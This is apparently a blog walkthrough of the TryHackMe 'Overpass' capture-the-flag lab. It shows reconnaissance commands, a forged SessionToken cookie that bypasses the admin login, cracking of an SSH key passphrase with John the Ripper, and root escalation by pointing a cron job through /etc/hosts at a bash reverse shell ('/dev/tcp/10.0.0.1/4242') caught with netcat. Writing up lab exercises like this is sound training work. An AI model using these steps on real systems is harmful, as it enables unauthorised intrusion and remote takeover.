TryHackMe|Overpass

Hello everyone,Let’s solve overpass series.overpass series is one of the best machines i ever solved.ok let’s begin .

This is the first machine in overpass series.it is rated as easy to solve.It comes with two flags.

Let’s begin.

i’m using Ubuntu as my attacker machine……..

First let’s find the open ports and thier versions by using nmap…

“nmap -sC -sV <IP> -oN scan -vv ”

ok we got two ports open 80 and 22.

Let’s find any interesting things in that website..

It’s just a website.Nothing found here.So,let’s bruteforce some directories.I’m using gobuster for finding directories.

“gobuster -u http://<IP> -w /usr/share/dirb/wordlists/common.txt -t 50”

After running gobuster i’ve some interesting directories…

Ok.There is an admin panel.But we don’t have any credentials to login.But i found something interesting here.

Let’s have a look at the login page…

Ok we’ve got no username and password but when we go through source code we’ll find some interesting javascript.

Ok.There is a main.js ,login.js and cookie.js. when we observe the code in login.js i found this.

Let’s obeserve this very close.I’ve spent my whole time here.i’m very new to javascript.So,if we observe the code.Let me explain the code.First it takes the input and assign some const variables which they can’t be changes and they will remain constant.and then it will send the credentials to api.If our credentials are wrong it will print Incorrect Credentials.if Credentials are correct it will set a SessionToken cookie.There is no value is given for the sessionToken.So let’s try to create a SessionToken cookie to bypass it.

Presently there are no cookie’s we’ll create one.

Ok i’ve created a cookie with name “SessionToken” And the value to that SessionToken is set to some random numbers.As the javascript is just create a cookie with the name SessionToken.there is no such values defined for sessiontoken.So,set it anything you want.now let’s refresh the admin page.

OK we’ve got a ssh Private key.But it is encrypted by using some military grade encryption.But i don’t know what kind of encryption it is.

Before bruteforcing the private key we need to change this private key into hash by using ssh2john tool.So let’s go the john the ripper directory for this python built tool.Locate the tools in your machine and run it.So,we got the hash but we need to find what is military grade encryption.

“python ssh2john.py id_rsa >hash”

Ok.Let’s open the hash..

This is the hash.Let’s crack this hash using john the ripper.

“john hash --wordlist=rockyou.txt”

i’ve build my john in ubuntu .so it will be different from yours.The above command will work you.

Ok.We got the password.Now let’s login using this password as james.

“ssh -i id_rsa james@<IP> “

Ok.We are in as james.Now if we list the files in the current directory.we can find our first flag.Ok

OK we are done with flag-1.Now it’s time to privilege escalation.I’m a little bit poor in this part.Ok ,without any delay let’s explore this machine a little bit and then we’ll look at priviesc.ok.we have a todo text file.Let’s open it.

“cat /home/james/todo.txt”

Sry i forgot to take screenshot here.So i’ve taken it when i completed the lab.That’s why it’s showing root.Don’t bother.Now let’s dig in.

Ok.this says paradox created some automated tasks but,they are not updating on the website.To find the automated tasks let’s open crontab.

“cat /etc/crontab”

Ok,here is the crontab.we have some buildscript but it is with the domain name.I searched for it but not found.This tooks me a while to figure it out.But unfortunately my knowledge is not enough.So i’ve gone through a writeup and got it. As we can see there is a domain name.So ,let’s open the /etc/hosts file to check .The doman is working on localhost.Not we’ll change the IP address to our machine Ip address and create buildscript.sh in the same path mentioned on the crontab.

“nano /etc/hosts”

So i’ve added my IP address to the hosts file.Now let’s start our server and create downloads/src/buildscript.sh.

Now let’s place our bash reverse shell here.

echo “bash -i >& /dev/tcp/10.0.0.1/4242 0>&1” > buildscript.sh

Now let’s setup a listener using netcat.

“nc -lvnp 4242”

once the script gets executed we’ll get the root shell.

“cat /root/root.txt”

we’ll get the flag. done…..

THANK YOU……

If you have any doubts Let me know.

Insta:https://www.instagram.com/sampath.pendurthi/

LinkedIN:https://www.linkedin.com/in/sampath-pendurthi/

HAPPY HACKING…..

PEACE……..

--

--

--

Ethical Hacker,Dream chaser.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A Chrome app to rule them all (Paywalls) : Part 1

You read a lot

One month in, what have I learned?!

ReactJs component lifecycle methods — A deep dive

Promise to async/await migration

Creating discussion board in five weeks— week one

WHAT’S NEW IN DART 2.15

Reactception : extending VS Code extension with webviews and React

Gatsby Error Monitoring with Sentry

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sampath Pendurthi

Sampath Pendurthi

Ethical Hacker,Dream chaser.

More from Medium

HackFridays with Cyrex

Tryhackme NerdHerd Room

Team — TryHackMe

Hack The Box — Grandpa